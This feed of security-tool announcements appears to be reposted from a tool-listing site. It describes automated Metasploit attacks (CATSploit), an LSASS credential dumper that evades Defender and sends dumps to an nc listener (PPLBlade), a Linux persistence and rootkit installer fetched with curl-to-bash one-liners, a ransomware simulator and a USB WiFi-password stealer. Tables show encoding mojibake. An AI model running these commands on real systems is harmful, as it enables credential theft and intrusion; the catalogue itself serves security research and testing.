FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayTools

CATSploit - An Automated Penetration Testing Tool Using Cyber Attack Techniques Scoring

By: Zion3R


CATSploit is an automated penetration testing tool using Cyber Attack Techniques Scoring (CATS) method that can be used without pentester. Currently, pentesters implicitly made the selection of suitable attack techniques for target systems to be attacked. CATSploit uses system configuration information such as OS, open ports, software version collected by scanner and calculates a score value for capture eVc and detectability eVd of each attack techniques for target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack(professional pentester’s skill) .

CATSploit automatically performs penetration tests in the following sequence:

  1. Information gathering and prior information input First, gathering information of target systems. CATSploit supports nmap and OpenVAS to gather information of target systems. CATSploit also supports prior information of target systems if you have.

  2. Calculating score value of attack techniques Using information obtained in the previous phase and attack techniques database, evaluation values of capture (eVc) and detectability (eVd) of each attack techniques are calculated. For each target computer, the values of each attack technique are calculated.

  3. Selection of attack techniques by using scores and make attack scenario Select attack techniques and create attack scenarios according to pre-defined policies. For example, for a policy that prioritized hard-to-detect, the attack techniques with the lowest eVd(Detectable Score) will be selected.

  4. Execution of attack scenario CATSploit executes the attack techniques according to attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and Metasploit API to execute actual attacks.


Prerequisities

CATSploit has the following prerequisites:

  • Kali Linux 2023.2a

Installation

For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.

Installing CATSploit

To install the latest version of CATSploit, please use the following commands:

Cloneing and setup
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh

Editing configuration file

CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json, the following fields should be modified for your environment.

  • DBMS
    • dbname: database name created for CATSploit
    • user: username of PostgreSQL
    • password: password of PostgrSQL
    • host: If you are using a database on a remote host, specify the IP address of the host
  • SCENARIO
    • generator.maxscenarios: Maximum number of scenarios to calculate (*)
  • ATTACKPF
    • msfpassword: password of MSFRPCD
    • openvas.user: username of PostgreSQL
    • openvas.password: password of PostgreSQL
    • openvas.maxhosts: Maximum number of hosts to be test at the same time (*)
    • openvas.maxchecks: Maximum number of test items to be test at the same time (*)
  • ATTACKDB
    • attack_db_dir: Path to the folder where AtackSteps are stored

(*) Adjust the number according to the specs of your machine.

Usage

To start the server, execute the following command:

$ python cats_server.py -c [CONFIG_FILE]

Next, prepare another console, start the client program, and initiate a connection to the server.

$ python catsploit.py -s [SOCKET_PATH]

After successfully connecting to the server and initializing it, the session will start.

   _________  ___________       __      _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/

[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>

The client can execute a variety of commands. Each command can be executed with -h option to display the format of its arguments.

usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...

positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}

options:
-h, --help show this help message and exit

I've posted the commands and options below as well for reference.

host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit

host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit

scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit

scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit

scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] targe t_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned

plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit

attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute

options:
-h, --help show this help message and exit

post find-secret:
find confidential information files that can be performed on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
op tions:
-h, --help show this help message and exit

reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit

exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit

Examples

In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.

catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
┑━━━━━━ ━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━┩
β”‚ attacker β”‚ 0.0.0.0 β”‚ kali β”‚ kali 2022.4 β”‚ True β”‚
β”‚ h_exbiy6 β”‚ 192.168.0.10 β”‚ β”‚ Linux 3.10 - 4.11 β”‚ False β”‚
β”‚ h_nhqyfq β”‚ 192.168.0.20 β”‚ β”‚ Microsoft Windows 7 SP1 β”‚ False β”‚
└──────────┴ β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”˜


catsploit> host detail h_exbiy6
┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
┑━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━┩
β”‚ h_exbiy6 β”‚ 192.168.0.10 β”‚ ubuntu β”‚ ubuntu 14.04 β”‚ False β”‚
└──────────┴──────────────┴──────────┴──────────────┴─ β”€β”€β”€β”€β”€β”˜

[IP address]
┏━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━┓
┃ ipv4 ┃ ipv4mask ┃ ipv6 ┃ ipv6prefix ┃
┑━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━┩
β”‚ 192.168.0.10 β”‚ β”‚ β”‚ β”‚
└──────────── β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Open ports]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ service ┃ product ┃ version ┃
┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 192.168.0.10 β”‚ tcp β”‚ 21 β”‚ ftp β”‚ ProFTPD β”‚ 1.3.5 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ ssh β”‚ OpenSSH β”‚ 6.6.1p1 Ubuntu 2ubuntu2.10 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ http β”‚ Apache httpd β”‚ 2.4.7 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 445 β”‚ netbios-ssn β”‚ Samba smbd β”‚ 3.X - 4.X β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ ipp β”‚ CUPS β”‚ 1.7 β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Vulnerabilities]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ vuln_name ┃ cve ┃
┑━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━┩
β”‚ 192.168.0.10 β”‚ tcp β”‚ 0 β”‚ TCP Timestamps Information Disclosure β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 21 β”‚ FTP Unencrypted Cleartext Login β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak MAC Algorithm(s) Supported (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Encryption Algorithm(s) Supported (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Host Key Algorithm(s) (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 22 β”‚ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Test HTTP dangerous methods β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check β”‚ CVE-2014-3704 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Sensitive File Disclosure (HTTP) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Unprotected Web App / Device Installers (HTTP) β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Cleartext Transmission of Sensitive Information via HTTP β”‚ N/A β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ jQuery < 1.9.0 XSS Vulnerability β”‚ CVE-2012-6708 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ jQuery < 1.6.3 XSS Vulnerability β”‚ CVE-2011-4969 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 80 β”‚ Drupal 7.0 Information Disclosure Vulnerability - Active Check β”‚ CVE-2011-3730 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2016-2183 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2016-6329 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β”‚ CVE-2020-12872 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β”‚ CVE-2011-3389 β”‚
β”‚ 192.168.0.10 β”‚ tcp β”‚ 631 β”‚ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β”‚ CVE-2015-0204 β”‚
└──────────────┴───────┴──────┴─────────────────────────────────────────────────────────────────────┴───& #9472;β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

[Users]
┏━━━━━━━━━━━┳━━━━━━━┓
┃ user name ┃ group ┃
┑━━━━━━━━━━━╇━━━━━━━┩
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”˜


catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
┏━━━━━━━━━━━━━┳━━━━━ ━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ scenario id ┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃ steps ┃ first attack step ┃
┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━&#947 3;━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 3d3ivc β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 1.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 5gnsvh β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 1.0 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 6nlxyc β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 48.32 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 8jos4z β”‚ 0.0.0.0 β”‚ 192.168.0.1 0 β”‚ 0.7 β”‚ 72.8 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ 8kmmts β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/elasticsearch/… β”‚
β”‚ agjmma β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 24.0 β”‚ 1 β”‚ exploit/windows/http/managee… β”‚
β”‚ joglhf β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 70.0 β”‚ 60.0 β”‚ 1 β”‚ auxiliary/scanner/ssh/ssh_lo… β”‚
β”‚ rmgrof β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 100.0 β”‚ 32.0 β”‚ 1 β”‚ exploit/multi/http/drupal_dr… β”‚
β”‚ xuowzk β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.0 β”‚ 24.0 β”‚ 1 β”‚ exploit/multi/http/struts_dm… β”‚
β”‚ yttv51 β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.01 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β”‚ znv76x β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 0.01 β”‚ 53.76 β”‚ 2 β”‚ exploit/multi/http/jenkins_s… β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

catsploit> scenario detail rmgrof
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┓
┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃
┑━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━┩
β”‚ 0.0.0.0 β”‚ 192.168.0.10 β”‚ 100.0 β”‚ 32.0 β”‚
└─────────────┴──────── β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”˜

[Steps]
┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━┓
┃ # ┃ step ┃ params ┃
┑━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━┩
β”‚ 1 β”‚ exploit/multi/http/drupal_drupageddon β”‚ RHOSTS: 192.168.0.10 β”‚
β”‚ β”‚ β”‚ LHOST: 192.168.10.100 β”‚
β””β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜


catsploit> attack rmgrof
> ~> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!


catsploit> exit
Bye.

Disclaimer

All informations and codes are provided solely for educational purposes and/or testing your own systems.

Contact

For any inquiry, please contact the email address as follows:

catsploit@nk.MitsubishiElectric.co.jp



PPLBlade - Protected Process Dumper Tool

By: Zion3R


Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.

Key functionalities:

  1. Bypassing PPL protection
  2. Obfuscating memory dump files to evade Defender signature-based detection mechanisms
  3. Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump)

Overview of the techniques, used in this tool can be found here: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

Note that PROCEXP15.SYS is listed in the source files for compiling purposes. It does not need to be transferred on the target machine alongside the PPLBlade.exe.

It’s already embedded into the PPLBlade.exe. The exploit is just a single executable.

Modes:

  1. Dump - Dump process memory using PID or Process Name
  2. Decrypt - Revert obfuscated(--obfuscate) dump file to its original state
  3. Cleanup - Do cleanup manually, in case something goes wrong on execution (Note that the option values should be the same as for the execution, we're trying to clean up)
  4. DoThatLsassThing - Dump lsass.exe using Process Explorer driver (basic poc)

Handle Modes:

  1. Direct - Opens PROCESS_ALL_ACCESS handle directly, using OpenProcess() function
  2. Procexp - Uses PROCEXP152.sys to obtain a handle
Examples:

Basic POC that uses PROCEXP152.sys to dump lsass:

PPLBlade.exe --mode dothatlsassthing

(Note that it does not XOR dump file, provide an additional obfuscate flag to enable the XOR functionality)

Upload the obfuscated LSASS dump onto a remote location:

PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

Attacker host:

nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

Deobfuscate memory dump:

PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade


Valid8Proxy - Tool Designed For Fetching, Validating, And Storing Working Proxies

By: Zion3R


Valid8Proxy is a versatile and user-friendly tool designed for fetching, validating, and storing working proxies. Whether you need proxies for web scraping, data anonymization, or testing network security, Valid8Proxy simplifies the process by providing a seamless way to obtain reliable and verified proxies.


Features:

  1. Proxy Fetching: Retrieve proxies from popular proxy sources with a single command.
  2. Proxy Validation: Efficiently validate proxies using multithreading to save time.
  3. Save to File: Save the list of validated proxies to a file for future use.

Usage:

  1. Clone the Repository:

    git clone https://github.com/spyboy-productions/Valid8Proxy.git
  2. Navigate to the Directory:

    cd Valid8Proxy
  3. Install Dependencies:

    pip install -r requirements.txt
  4. Run the Tool:

    python Valid8Proxy.py
  5. Follow Interactive Prompts:

    • Enter the number of proxies you want to print.
    • Sit back and let Valid8Proxy fetch, validate, and display working proxies.
  6. Save to File:

    • At the end of the process, Valid8Proxy will save the list of working proxies to a file named "proxies.txt" in the same directory.
  7. Check Results:

    • Review the working proxies in the terminal with color-coded output.
    • Find the list of working proxies saved in "proxies.txt."

If you already have proxies just want to validate usee this:

python Validator.py

Follow the prompts:

Enter the path to the file containing proxies (e.g., proxy_list.txt). Enter the number of proxies you want to validate. The script will then validate the specified number of proxies using multiple threads and print the valid proxies.

Contribution:

Contributions and feature requests are welcome! If you encounter any issues or have ideas for improvement, feel free to open an issue or submit a pull request.

Snapshots:

If you find this GitHub repo useful, please consider giving it a star!



Wireshark Analyzer 4.2.2

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.

D3m0n1z3dShell - Demonized Shell Is An Advanced Tool For Persistence In Linux

By: Zion3R


Demonized Shell is an Advanced Tool for persistence in linux.


Install

git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh

One-Liner Install

Download D3m0n1z3dShell with all files:

curl -L https://github.com/MatheuZSecurity/D3m0n1z3dShell/archive/main.tar.gz | tar xz && cd D3m0n1z3dShell-main && sudo ./demonizedshell.sh

Load D3m0n1z3dShell statically (without the static-binaries directory):

sudo curl -s https://raw.githubusercontent.com/MatheuZSecurity/D3m0n1z3dShell/main/static/demonizedshell_static.sh -o /tmp/demonizedshell_static.sh && sudo bash /tmp/demonizedshell_static.sh

Demonized Features

  • Auto Generate SSH keypair for all users
  • APT Persistence
  • Crontab Persistence
  • Systemd User level
  • Systemd Root Level
  • Bashrc Persistence
  • Privileged user & SUID bash
  • LKM Rootkit Modified, Bypassing rkhunter & chkrootkit
  • LKM Rootkit With file encoder. persistent icmp backdoor and others features.
  • ICMP Backdoor
  • LD_PRELOAD Setup PrivEsc
  • Static Binaries For Process Monitoring, Dump credentials, Enumeration, Trolling and Others Binaries.

Pending Features

  • LD_PRELOAD Rootkit
  • Process Injection
  • install for example: curl github.com/test/test/demonized.sh | bash
  • Static D3m0n1z3dShell
  • Intercept Syscall Write from a file
  • ELF/Rootkit Anti-Reversing Technique
  • PAM Backdoor
  • rc.local Persistence
  • init.d Persistence
  • motd Persistence
  • Persistence via php webshell and aspx webshell

And other types of features that will come in the future.

Contribution

If you want to contribute and help with the tool, please contact me on twitter: @MatheuzSecurity

Note

We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.



SQLMAP - Automatic SQL Injection Tool 1.8

sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.

PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

By: Zion3R


PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

Features:

  • Utilizes a list of proxy IP addresses from a specified file.
  • Supports both HTTP and HTTPS proxies.
  • Allows users to input the target website URL, proxy file path, and a static port.
  • Makes HTTP requests to the specified website using each proxy.
  • Parses HTML content to extract and visit links on the webpage.

Usage:

  • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
  • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
  • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
  • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
  • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

Get New Proxies with port and add in proxies.txt in this format 50.168.163.176:80
  • You can add it from here: https://free-proxy-list.net/ these free proxies are not validated some might not work so first validate these proxies before adding.

How to Use:

  1. Clone the repository:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
  1. Install dependencies:
pip3 install -r requirements.txt
  1. Run the script:
python3 PhantomCrawler.py

Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


Snapshots:

If you find this GitHub repo useful, please consider giving it a star!Β 



Proxmark3 4.17768 Custom Firmware

This is a custom firmware written for the Proxmark3 device. It extends the currently available firmware. This release is nicknamed Steamboat Willie.

Faraday 5.0.1

Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.

RansomwareSim - A Simulated Ransomware

By: Zion3R

Overview

RansomwareSim is a simulated ransomware application developed for educational and training purposes. It is designed to demonstrate how ransomware encrypts files on a system and communicates with a command-and-control server. This tool is strictly for educational use and should not be used for malicious purposes.

Features

  • Encrypts specified file types within a target directory.
  • Changes the desktop wallpaper (Windows only).
  • Creates&Delete a README file on the desktop with a simulated ransom note.
  • Simulates communication with a command-and-control server to send system data and receive a decryption key.
  • Decrypts files after receiving the correct key.

Usage

Important: This tool should only be used in controlled environments where all participants have given consent. Do not use this tool on any system without explicit permission. For more, read SECURE

Requirements

  • Python 3.x
  • cryptography
  • colorama

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/RansomwareSim.git
  2. Navigate to the project directory:

    cd RansomwareSim
  3. Install the required dependencies:

    pip install -r requirements.txt

ο“– My Book

Running the Control Server

  1. Open controlpanel.py.
  2. Start the server by running controlpanel.py.
  3. The server will listen for connections from RansomwareSim and the Decoder.

Running the Simulator

  1. Navigate to the directory containing RansomwareSim.
  2. Modify the main function in encoder.py to specify the target directory and other parameters.
  3. Run encoder.py to start the encryption process.
  4. Follow the instructions displayed on the console.

Running the Decoder

  1. Run decoder.py after the files have been encrypted.
  2. Follow the prompts to input the decryption key.

Disclaimer

RansomwareSim is developed for educational purposes only. The creators of RansomwareSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.

Contributing

Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

For any inquiries or further information, you can reach me through the following channels:



RansomLord Anti-Ransomware Exploit Tool 2

RansomLord is a proof-of-concept tool that automates the creation of PE files, used to compromise ransomware pre-encryption. This tool uses dll hijacking to defeat ransomware by placing PE files in the x32 or x64 directories where the program is run from.

Stegano 0.11.3

Stegano is a basic Python Steganography module. Stegano implements two methods of hiding: using the red portion of a pixel to hide ASCII messages, and using the Least Significant Bit (LSB) technique. It is possible to use a more advanced LSB method based on integers sets. The sets (Sieve of Eratosthenes, Fermat, Carmichael numbers, etc.) are used to select the pixels used to hide the information.

WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R


Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

Β 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

